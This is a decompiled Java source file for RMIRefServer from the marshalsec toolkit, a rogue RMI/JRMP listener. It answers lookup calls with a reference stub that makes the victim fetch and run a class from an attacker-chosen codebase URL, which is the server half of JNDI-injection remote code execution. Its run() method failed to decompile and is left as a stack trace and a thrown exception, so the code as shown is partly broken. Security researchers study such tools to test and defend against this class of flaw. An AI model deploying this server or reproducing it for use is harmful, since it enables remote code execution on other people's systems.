/*
 * Decompiled with CFR 0.152.
 */
package marshalsec.jndi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.net.URLClassLoader;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObject;
import java.rmi.server.UID;
import java.util.Arrays;
import javassist.ClassClassPath;
import javassist.ClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javax.naming.Reference;
import javax.net.ServerSocketFactory;
import marshalsec.util.Reflections;
import sun.rmi.server.UnicastServerRef;

public class RMIRefServer
implements Runnable {
    private int port;
    private ServerSocket ss;
    private Object waitLock = new Object();
    private boolean exit;
    private boolean hadConnection;
    private URL classpathUrl;

    public RMIRefServer(int port, URL classpathUrl) throws IOException {
        this.port = port;
        this.classpathUrl = classpathUrl;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    public boolean waitFor(int i) {
        try {
            if (this.hadConnection) {
                return true;
            }
            System.err.println("Waiting for connection");
            Object object = this.waitLock;
            synchronized (object) {
                this.waitLock.wait(i);
            }
            return this.hadConnection;
        }
        catch (InterruptedException e) {
            return false;
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    public void close() {
        this.exit = true;
        try {
            this.ss.close();
        }
        catch (IOException iOException) {
            // empty catch block
        }
        Object object = this.waitLock;
        synchronized (object) {
            this.waitLock.notify();
        }
    }

    public static final void main(String[] args) {
        int port = 1099;
        if (args.length < 1 || args[0].indexOf(35) < 0) {
            System.err.println(RMIRefServer.class.getName() + "<codebase_url#classname> [<port>]");
            System.exit(-1);
            return;
        }
        if (args.length >= 2) {
            port = Integer.parseInt(args[1]);
        }
        try {
            System.err.println("* Opening JRMP listener on " + port);
            RMIRefServer c = new RMIRefServer(port, new URL(args[0]));
            c.run();
        }
        catch (Exception e) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
    }

    /*
     * Exception decompiling
     */
    @Override
    public void run() {
        /*
         * This method has failed to decompile.  When submitting a bug report, please provide this stack trace, and (if you hold appropriate legal rights) the relevant class file.
         * 
         * org.benf.cfr.reader.util.ConfusedCFRException: Tried to end blocks [6[TRYBLOCK]], but top level block is 17[CASE]
         *     at org.benf.cfr.reader.bytecode.analysis.opgraph.Op04StructuredStatement.processEndingBlocks(Op04StructuredStatement.java:435)
         *     at org.benf.cfr.reader.bytecode.analysis.opgraph.Op04StructuredStatement.buildNestedBlocks(Op04StructuredStatement.java:484)
         *     at org.benf.cfr.reader.bytecode.analysis.opgraph.Op03SimpleStatement.createInitialStructuredBlock(Op03SimpleStatement.java:736)
         *     at org.benf.cfr.reader.bytecode.CodeAnalyser.getAnalysisInner(CodeAnalyser.java:850)
         *     at org.benf.cfr.reader.bytecode.CodeAnalyser.getAnalysisOrWrapFail(CodeAnalyser.java:278)
         *     at org.benf.cfr.reader.bytecode.CodeAnalyser.getAnalysis(CodeAnalyser.java:201)
         *     at org.benf.cfr.reader.entities.attributes.AttributeCode.analyse(AttributeCode.java:94)
         *     at org.benf.cfr.reader.entities.Method.analyse(Method.java:531)
         *     at org.benf.cfr.reader.entities.ClassFile.analyseMid(ClassFile.java:1055)
         *     at org.benf.cfr.reader.entities.ClassFile.analyseTop(ClassFile.java:942)
         *     at org.benf.cfr.reader.Driver.doJarVersionTypes(Driver.java:257)
         *     at org.benf.cfr.reader.Driver.doJar(Driver.java:139)
         *     at org.benf.cfr.reader.CfrDriverImpl.analyse(CfrDriverImpl.java:76)
         *     at org.benf.cfr.reader.Main.main(Main.java:54)
         */
        throw new IllegalStateException("Decompilation failed");
    }

    private void doMessage(Socket s, DataInputStream in, DataOutputStream out) throws Exception {
        System.err.println("Reading message...");
        int op = in.read();
        switch (op) {
            case 80: {
                this.doCall(in, out);
                break;
            }
            case 82: {
                out.writeByte(83);
                break;
            }
            case 84: {
                UID.read(in);
                break;
            }
            default: {
                throw new IOException("unknown transport op " + op);
            }
        }
        s.close();
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void doCall(DataInputStream in, DataOutputStream out) throws Exception {
        ObjID read;
        ObjectInputStream ois = new ObjectInputStream(in){

            @Override
            protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
                if ("[Ljava.rmi.server.ObjID;".equals(desc.getName())) {
                    return ObjID[].class;
                }
                if ("java.rmi.server.ObjID".equals(desc.getName())) {
                    return ObjID.class;
                }
                if ("java.rmi.server.UID".equals(desc.getName())) {
                    return UID.class;
                }
                if ("java.lang.String".equals(desc.getName())) {
                    return String.class;
                }
                throw new IOException("Not allowed to read object");
            }
        };
        try {
            read = ObjID.read(ois);
        }
        catch (IOException e) {
            throw new MarshalException("unable to read objID", e);
        }
        if (read.hashCode() == 2) {
            RMIRefServer.handleDGC(ois);
        } else if (read.hashCode() == 0 && this.handleRMI(ois, out)) {
            this.hadConnection = true;
            Object object = this.waitLock;
            synchronized (object) {
                this.waitLock.notifyAll();
            }
            return;
        }
    }

    private boolean handleRMI(ObjectInputStream ois, DataOutputStream out) throws Exception {
        int method = ois.readInt();
        ois.readLong();
        if (method != 2) {
            return false;
        }
        String object = (String)ois.readObject();
        System.err.println("Is RMI.lookup call for " + object + " " + method);
        out.writeByte(81);
        try (MarshalOutputStream oos = new MarshalOutputStream(out, this.classpathUrl);){
            oos.writeByte(1);
            new UID().write(oos);
            System.err.println(String.format("Sending remote classloading stub targeting %s", new URL(this.classpathUrl, this.classpathUrl.getRef().replace('.', '/').concat(".class"))));
            ReferenceWrapper rw = Reflections.createWithoutConstructor(ReferenceWrapper.class);
            Reflections.setFieldValue(rw, "wrappee", new Reference("Foo", this.classpathUrl.getRef(), this.classpathUrl.toString()));
            Field refF = RemoteObject.class.getDeclaredField("ref");
            refF.setAccessible(true);
            refF.set(rw, new UnicastServerRef(12345));
            oos.writeObject(rw);
            oos.flush();
            out.flush();
        }
        return true;
    }

    private static void handleDGC(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ois.readInt();
        ois.readLong();
        System.err.println("Is DGC call for " + Arrays.toString((ObjID[])ois.readObject()));
    }

    protected static Object makeDummyObject(String className) {
        try {
            ClassLoader isolation = new ClassLoader(){};
            ClassPool cp = new ClassPool();
            cp.insertClassPath((ClassPath)new ClassClassPath(Dummy.class));
            CtClass clazz = cp.get(Dummy.class.getName());
            clazz.setName(className);
            return clazz.toClass(isolation).newInstance();
        }
        catch (Exception e) {
            e.printStackTrace();
            return new byte[0];
        }
    }

    static final class MarshalOutputStream
    extends ObjectOutputStream {
        private URL sendUrl;

        public MarshalOutputStream(OutputStream out, URL u) throws IOException {
            super(out);
            this.sendUrl = u;
        }

        MarshalOutputStream(OutputStream out) throws IOException {
            super(out);
        }

        @Override
        protected void annotateClass(Class<?> cl) throws IOException {
            if (this.sendUrl != null) {
                this.writeObject(this.sendUrl.toString());
            } else if (!(cl.getClassLoader() instanceof URLClassLoader)) {
                this.writeObject(null);
            } else {
                URL[] us = ((URLClassLoader)cl.getClassLoader()).getURLs();
                String cb = "";
                for (URL u : us) {
                    cb = cb + u.toString();
                }
                this.writeObject(cb);
            }
        }

        @Override
        protected void annotateProxyClass(Class<?> cl) throws IOException {
            this.annotateClass(cl);
        }
    }

    public static class Dummy
    implements Serializable {
        private static final long serialVersionUID = 1L;
    }
}

